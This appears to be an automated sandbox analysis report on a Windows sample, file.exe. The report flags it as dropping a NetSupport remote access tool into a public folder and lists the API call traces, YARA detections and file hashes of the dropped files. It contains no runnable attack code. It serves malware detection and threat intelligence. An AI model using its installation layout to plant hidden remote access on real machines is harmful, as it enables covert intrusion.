Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	6_2_110D8200
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1CA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	9_2_110D8200

Yara detected NetSupport remote tool

Source: Yara match	File source: 9.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.70030000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.74a90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.6d1c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1562378
Product:	CloudBasic
Start time:	15:09:24
Start date:	25.11.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a3cea314d888a08b79002656a9f4b927
SHA1:	396b9f96219785f0c80c69703dc623c23554affc
SHA256:	64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Filetype:	Win64 Executable GUI (202006/5) 92.65%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\Netstat\HTCTL32.DLL	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2D3B207C8A48148296156E5725426C7F	AD464EB7CF5C19C8A443AB5B590440B32DBC618F	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
C:\Users\Public\Netstat\NSM.LIC	ASCII text, with CRLF line terminators	7067AF414215EE4C50BFCD3EA43C84F0	C331D410672477844A4CA87F43A14E643C863AF9	2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
C:\Users\Public\Netstat\PCICHEK.DLL	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A0B9388C5F18E27266A31F8C5765B263	906F7E94F841D464D4DA144F7C858FA2160E36DB	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
C:\Users\Public\Netstat\PCICL32.DLL	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	00587238D16012152C2E951A087F2CC9	C4E27A43075CE993FF6BB033360AF386B2FC58FF	63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
C:\Users\Public\Netstat\TCCTL32.DLL	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	EAB603D12705752E3D268D86DFF74ED4	01873977C871D3346D795CF7E3888685DE9F0B16	6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
C:\Users\Public\Netstat\client32.ini	ASCII text, with CRLF line terminators	5778ABD7CF2E8039239CD5982281D61A	9AA6E80A115343A100031C9473FC6A071EEFD07E	0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
C:\Users\Public\Netstat\msvcr100.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0E37FBFA79D349D672456923EC5FBBE3	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
C:\Users\Public\Netstat\netsup.bat	DOS batch file, ASCII text, with CRLF line terminators	B50D05F1710CD8674DB0AE8207722DD0	9896143256FB62F915EA41D8001AD10BC66D99BB	F4A4726FDF39D43807ED2786BB9B2F881C8C7C8B666E14A96F7B2239C7A4BEDD
C:\Users\Public\Netstat\nskbfltr.inf	Windows setup INFormation	26E28C01461F7E65C402BDF09923D435	1D9B5CFCC30436112A7E31D5E4624F52E845C573	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
C:\Users\Public\Netstat\pcicapi.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	DCDE2248D19C778A41AA165866DD52D0	7EC84BE84FE23F0B0093B647538737E1F19EBB03	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
C:\Users\Public\Netstat\remcmdstub.exe	PE32 executable (console) Intel 80386, for MS Windows	325B65F171513086438952A152A747C4	A1D1C397902FF15C4929A03D582B09B35AA70FC0	26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
C:\Users\Public\Netstat\shv.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8D9709FF7D9C83BD376E01912C734F0A	E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294	49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loca[1].htm	ASCII text, with no line terminators	C40449C13038365A3E45AB4D7F3C2F3E	CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B	1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe